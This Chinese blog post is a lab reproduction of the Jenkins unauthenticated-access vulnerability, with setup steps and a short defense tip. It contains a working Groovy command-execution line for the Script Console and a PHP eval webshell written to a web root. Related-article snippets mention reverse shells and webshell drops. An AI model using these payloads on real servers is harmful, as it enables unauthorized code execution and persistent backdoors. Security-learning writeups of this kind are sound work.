【Jenkins】未授权访问漏洞

最新推荐文章于 2024-07-25 20:37:46 发布
最新推荐文章于 2024-07-25 20:37:46 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: web安全 文章标签: jenkins 运维
原文链接:https://blog.csdn.net/a6458360/article/details/107757830?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165725812316782390539195%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=165725812316782390539195&biz_id=0&utm_mediu
版权

一、漏洞介绍

1 ) Jenkins介绍

Jenkins是一个基于Java开发的开源项目,可在Tomcat等流行的servlet容器中运行,也可以独立运行,其功能如下:

  1. 用于持续性、自动的构建/测试软件
  2. 项目监控或跑一些定时任务
  3. 监控外部调用执行的工作

2 ) 漏洞原因

Jenkins系统后台中可以执行系统脚本命令,(本作用是故障排除和诊断使用)

3 ) 利用条件

  1. 使用低版本的Jenkins,默认没有登录控制
  2. 有登录控制,但配置文件中设置了不启用安全性(/var/lib/jenkins/config.xml 设置为false)
  3. 控制台使用了弱密码

二、环境配置

2.1 配置主机

受害者IP:192.168.253.128

系统内核版本:
在这里插入图片描述

2.2 下载安装

下载一: 镜像站下载(优点:下载快;缺点:不支持所有版本)

  • https://mirrors.tuna.tsinghua.edu.cn/jenkins/redhat/
    在这里插入图片描述

下载二: 官方下载(优点:版本全;缺点:下载慢)
官方下载系统内核对应的安装包(这里是rpm包安装方式)

》》安装
在这里插入图片描述
》》启动服务
在这里插入图片描述
》》防火墙配置(略,关闭防火墙/开通8080端口皆可)
》》浏览器访问8080端口进行 安装配置
在这里插入图片描述
》》解锁
在这里插入图片描述
》》安装插件
》》创建管理员账户
在这里插入图片描述
》》成功登陆,退出后发现之前admin的密码没有
在这里插入图片描述

忘记jenkins账户密码怎么办?(如使用rpm包安装使用此种方法!)
》》编辑jenkins全局配置文件(/var/lib/jenkins/config.xml)
在这里插入图片描述
》》取消掉使用密码
在这里插入图片描述
》》重置jenkins服务
systemctl restart jenkins / /etc/init.d/jenkins restart
》》然后再次访问web站点
在这里插入图片描述
》》启用安全性,选择jenkisn自己的数据库,点击保存
在这里插入图片描述
》》点击设置,配置管理员密码
在这里插入图片描述

三、漏洞利用

3.1 信息收集

Nmap扫描对方web服务:(不限于8080默认端口)
在这里插入图片描述
访问8080端口,如果没有登录限制如下这种情况:

Tips:以下这种情况有两种方式

  1. 低版本的jenkisns默认安装启动服务
  2. 配置中将登录密码验证关掉了(false)

在这里插入图片描述

3.2 漏洞利用

》》点击系统管理
在这里插入图片描述
》》点击脚本控制台
在这里插入图片描述
》》执行并打印系统命令

println "hostname".execute().text
1

 
 

 
 
  • 1
  • 2

在这里插入图片描述
如果知道web站点目录可写入一句话shell:(这里使用php站点举例)

new File("D:\\phpstudy_pro\\WWW\\php_shell.php").write('<?php @eval($_POST[cmd]);?>');
1

 
 

 
 
  • 1
  • 2

四、防御建议

  1. 配置Jenkins登录验证(只要不能进入控制台即可)
zxl2605
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jenkins授权访问
weixin_43622525的博客
03-04 2762
Jenkins Jenkins简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,它能把软件开发过程形成工作流。默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。 Jenkins授权访问 部署Jenkins 1.62版本,将全局授权策略打开,目前新版本的Jenkins已默认需要用户登录,但老版的中默认配置是“任意用...
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
jenkins授权访问漏洞总结
qq_45746681的博客
10-05 595
jenkins授权访问漏洞复现 0x00 漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 0x01 漏洞环境搭建(win10) 官方下载jenkins-1.620.zip,下载地址:http://mirrors.jenkins.io 运行setup.exe,安装即可,安装成功后在任务管理器中运行jenkins服务 之后访问http://localhost:8080即可 0x0
【护网必备】Jenkins综合漏洞的利用工具
Fly_鹏程万里
05-31 393
CVE-2015-8103/CVE-2016-0788 Jenkins 反序列化远程代码执行 https://github.com/Medicean/VulApps/tree/master/j/jenkins/1。CVE-2024-23897 Jenkins CLI 接口任意文件读取漏洞 https://github.com/vulhub/vulhub/blob/master/jenkins/CVE-2024-23897。本开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。
Jenkins授权访问漏洞
Kevin's Blog
07-31 1487
文章目录漏洞介绍环境配置配置主机下载安装漏洞利用防御建议 漏洞介绍 环境配置 配置主机 受害者IP:192.168.253.128 攻击者IP:192.168.1.102 系统内核版本: 下载安装 下载一: 镜像站下载(优点:下载快;缺点:不支持所有版本) https://mirrors.tuna.tsinghua.edu.cn/jenkins/redhat/ 下载二: 官方下载(优点:版本全;缺点:下载慢) 官方下载系统内核对应的安装包(这里是rpm包安装方式) http://mirrors
授权访问Jenkins授权访问漏洞
qq_68163788的博客
05-10 1237
enkins是一个流行的开源持续集成和持续交付工具,用于自动化软件开发过程中的构建、测试和部署。然而,Jenkins存在一个授权访问漏洞,即攻击者可以通过授权的方式访问Jenkins服务器,可能导致敏感信息泄露、恶意代码执行等安全风险。攻击者可以利用这个漏洞来获取对Jenkins服务器的控制权,进而破坏软件构建过程,篡改部署流程或者窃取敏感数据。为了防范此类漏洞,管理员应该及时更新Jenkins软件版本、配置访问控制策略、监控系统日志等措施来加强安全防护。
Jenkins授权访问漏洞&amp;命令执行
2401_85014013的博客
05-17 449
进入Script Console之后是一个执行脚本的页面查询当前用户查看IP配置信息。
jenkins授权访问漏洞复现
zhangpeng999123的博客
08-25 869
1安装jenkins wget http://download.baiyongjie.com/deploy/jdk-8u45-linux-x64.tar.gz wget http://download.baiyongjie.com/deploy/jenkins_2.121.2.war wget http://download.baiyongjie.com/deploy/apache-tomcat-8.5.4.tar.gz #安装jdk tar zxvf jdk-8u45-linux-x64.ta.
Jenkins授权访问漏洞复现与 getshell 利用方法汇总
W小哥
09-23 6762
一、Jenkins介绍 1.1 什么是JenkinsJenkins是一个开源的、提供友好操作界面的持续集成(CI)工具,起源于Hudson(Hudson是商用的),主要用于持续、自动的构建/测试软件项目、监控外部任务的运行。Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。常用的版本控制工具有SVN、GIT,构建工具有Maven、Ant、Gradle。 1.2 Jenkins的功能 Jenkins是一个基于J
Jenkins授权访问漏洞&命令执行
qq_45434762的博客
03-28 8977
Jenkins授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
jenkins授权访问漏洞
WY92139010的博客
08-04 1220
jenkins授权访问漏洞 一、漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建 1、官方下载jenkins-1.620-1.1.noarch.rpm,下载地址:http://mirrors.jenkins.io 2、在redhat...
99-web漏洞挖掘之授权访问漏洞1
08-03
授权访问漏洞】是指那些本应受到安全配置或权限认证保护的系统资源或服务,由于配置不当,允许任何用户经身份验证即可直接访问。这种漏洞可能导致敏感信息泄露、重要功能被恶意操作,严重威胁企业的数据安全。...
jenkins老版本资源
11-09
应定期更新其安全补丁,并限制对 Jenkins 服务器的访问权限,避免授权的用户进行操作。同时,监控 Jenkins 的日志,及时发现并处理潜在的安全问题。 综上所述,这个压缩包为那些需要使用 Jenkins 老版本的用户...
jenkins publish over ssh
02-10
8. 安全性:确保所有的 SSH 凭据安全存储,并且只授权必要的访问权限。定期更新私钥和密码,避免因安全漏洞导致的数据泄露。 通过正确配置 "Publish Over SSH" 插件,Jenkins 可以成为强大的自动化运维工具,帮助...
jenkins远程ssh部署插件,现已由于安全漏洞jenkins官方下架,需要的自取
02-12
这可能是由于插件中发现了可以被恶意利用的安全风险,例如授权访问、命令注入或者密码泄露等。当这样的问题出现时,为了保护用户的系统安全,官方会采取下架措施,建议用户更新到修复了这些问题的新版本,或者寻找...
Springboot集成Elasticsearch High Level REST Client实现增删改查实战
老徐的博客只有干货
07-25 1006
Elasticsearch 的 High Level REST Client 是一个用于与 Elasticsearch 进行交互的 Java 客户端库,它提供了比低级别的 REST 客户端更高级别的抽象。High Level REST Client 使用了 OkHttp 库作为底层的 HTTP 客户端,并且提供了自动重试、连接管理和错误处理等功能。它允许开发人员以面向对象的方式构建请求和解析响应,从而简化了与 Elasticsearch 的 REST API 的交互过程。
探索 Kubernetes 持久化存储之 Longhorn 初窥门径
KubeSphere
07-25 765
作者:运维有术星主在 Kubernetes 生态系统中,持久化存储扮演着至关重要的角色,它是支撑业务应用稳定运行的基石。对于那些选择自建 Kubernetes 集群的运维架构师而言,选择合适的后端持久化存储解决方案是一项至关重要的选型决策。目前 Ceph、GlusterFS、NFS、openEBS 等解决方案已被广泛采用。往期文章,我分享过最简单、实用的。为了丰富我们的技术栈,并为来的容器云平台设计持久化存储提供更多灵活性和选择性。
安装 Elasticsearch7
皮皮虾的博客
07-24 357
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -sudo apt-get install apt-transport-httpsecho “deb https://artifacts.elastic.co/packages/7.x/apt stable main” | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.listsudo apt-ge
如何利用Jenkins自动化管理、部署数百个应用
最新发布
AngelCryToo的专栏
07-25 817
Jenkins 中,转到 “管理 Jenkins” > “插件管理” > “可用” 标签页,搜索并安装 “Gradle” 插件。在 Jenkins 中,转到 “管理 Jenkins” > “插件管理”,安装 “ShiningPanda” 插件。在 “Gradle” 部分,点击 “添加 Gradle” 并配置 Gradle 的安装路径或选择自动安装。在 Jenkins 中,转到 “管理 Jenkins” > “插件管理”,安装 “MSBuild” 插件。安装完成后,Jenkins 会自动启动。
常见IT系统授权漏洞风险与Redis示例
本文主要探讨了多个常见的授权访问漏洞,涉及的IT服务和组件包括Redis、MongoDB、Jenkins、Memcached、JBOSS、VNC、Docker、ZooKeeper、Rsync、Atlassian Crowd、CouchDB、Elasticsearch和Hadoop。这些漏洞的共同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值